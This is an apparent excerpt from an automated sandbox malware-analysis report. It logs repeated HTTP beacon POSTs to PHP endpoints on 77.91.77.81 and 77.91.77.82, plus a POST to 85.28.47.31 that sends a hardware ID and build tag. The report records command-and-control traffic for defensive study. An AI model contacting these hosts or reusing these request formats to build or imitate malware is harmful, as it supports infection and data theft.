                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 34 32 41 32 42 37 30 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="hwid"8A42A2B70D8C1730677652------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="build"sila------FCBFBGDBKJKECAAKKFHD--
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
